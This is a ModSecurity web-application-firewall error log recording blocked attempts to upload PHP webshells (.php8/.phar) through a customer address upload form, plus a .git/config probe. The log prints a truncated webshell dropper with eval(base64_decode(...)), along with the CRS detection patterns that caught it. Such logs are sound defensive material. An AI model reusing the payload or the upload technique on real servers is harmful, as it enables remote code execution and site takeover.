[Sat Feb 14 12:01:14.871467 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aZBV-pFWJBwiiU1SR7xJYAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.871650 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aZBV-pFWJBwiiU1SR7xJYAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:54.734037 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Rule 7f24aec98be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.phar"] [unique_id "aZFc3ikjF8zJ5aN1hqXShAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:54.734522 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.phar"] [unique_id "aZFc3ikjF8zJ5aN1hqXShAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:54.736924 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.phar"] [unique_id "aZFc3ikjF8zJ5aN1hqXShAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:54.737105 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.phar"] [unique_id "aZFc3ikjF8zJ5aN1hqXShAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:54.924448 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: kc88364f428d25.php8 found within FILES:custom_attributes[country_id]: kc88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZFc3ikjF8zJ5aN1hqXShQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/c/kc88364f428d25.phar
[Sun Feb 15 06:42:54.925574 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZFc3ikjF8zJ5aN1hqXShQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/c/kc88364f428d25.phar
[Sun Feb 15 06:42:54.925855 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZFc3ikjF8zJ5aN1hqXShQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/c/kc88364f428d25.phar
[Sun Feb 15 06:42:55.142845 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Rule 7f24aec98be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.php8"] [unique_id "aZFc3ykjF8zJ5aN1hqXShgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:55.143301 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.php8"] [unique_id "aZFc3ykjF8zJ5aN1hqXShgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:55.145589 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.php8"] [unique_id "aZFc3ykjF8zJ5aN1hqXShgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 15 06:42:55.145775 2026] [:error] [pid 2096238] [client 185.65.202.110:45872] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/c/kc88364f428d25.php8"] [unique_id "aZFc3ykjF8zJ5aN1hqXShgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 16:55:21.825637 2026] [:error] [pid 2118224] [client 64.247.196.28:62388] [client 64.247.196.28] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aZM96TbZLY_R4xCZnWFTCwAAAAU"]
[Mon Feb 16 16:55:21.826884 2026] [:error] [pid 2118224] [client 64.247.196.28:62388] [client 64.247.196.28] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aZM96TbZLY_R4xCZnWFTCwAAAAU"]
[Mon Feb 16 16:55:21.827057 2026] [:error] [pid 2118224] [client 64.247.196.28:62388] [client 64.247.196.28] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aZM96TbZLY_R4xCZnWFTCwAAAAU"]
[Mon Feb 16 22:25:56.440422 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Rule 7fa9eb92abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.phar"] [unique_id "aZOLZGSMxKfe39RQ6OXXYgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.440984 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.phar"] [unique_id "aZOLZGSMxKfe39RQ6OXXYgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.443450 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.phar"] [unique_id "aZOLZGSMxKfe39RQ6OXXYgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.443637 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.phar"] [unique_id "aZOLZGSMxKfe39RQ6OXXYgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.620601 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 4m88364f428d25.php8 found within FILES:custom_attributes[country_id]: 4m88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZOLZGSMxKfe39RQ6OXXYwAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/4/m/4m88364f428d25.phar
[Mon Feb 16 22:25:56.621264 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZOLZGSMxKfe39RQ6OXXYwAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/4/m/4m88364f428d25.phar
[Mon Feb 16 22:25:56.621451 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZOLZGSMxKfe39RQ6OXXYwAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/4/m/4m88364f428d25.phar
[Mon Feb 16 22:25:56.855475 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Rule 7fa9eb92abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.php8"] [unique_id "aZOLZGSMxKfe39RQ6OXXZAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.855931 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.php8"] [unique_id "aZOLZGSMxKfe39RQ6OXXZAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.858276 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.php8"] [unique_id "aZOLZGSMxKfe39RQ6OXXZAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 16 22:25:56.858472 2026] [:error] [pid 2125962] [client 213.109.225.211:5794] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/m/4m88364f428d25.php8"] [unique_id "aZOLZGSMxKfe39RQ6OXXZAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:13.686193 2026] [:error] [pid 2145579] [client 194.110.207.62:44734] [client 194.110.207.62] ModSecurity: Rule 7fc810f2cbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aZSVAUuqcvp1BrXo3-ej2gAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:13.686721 2026] [:error] [pid 2145579] [client 194.110.207.62:44734] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aZSVAUuqcvp1BrXo3-ej2gAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:13.689184 2026] [:error] [pid 2145579] [client 194.110.207.62:44734] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aZSVAUuqcvp1BrXo3-ej2gAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:13.689374 2026] [:error] [pid 2145579] [client 194.110.207.62:44734] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.phar"] [unique_id "aZSVAUuqcvp1BrXo3-ej2gAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:19.569147 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: bt88364f428d25.php8 found within FILES:custom_attributes[country_id]: bt88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZSVB8cgI00pQY9tm9s8qAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/t/bt88364f428d25.phar
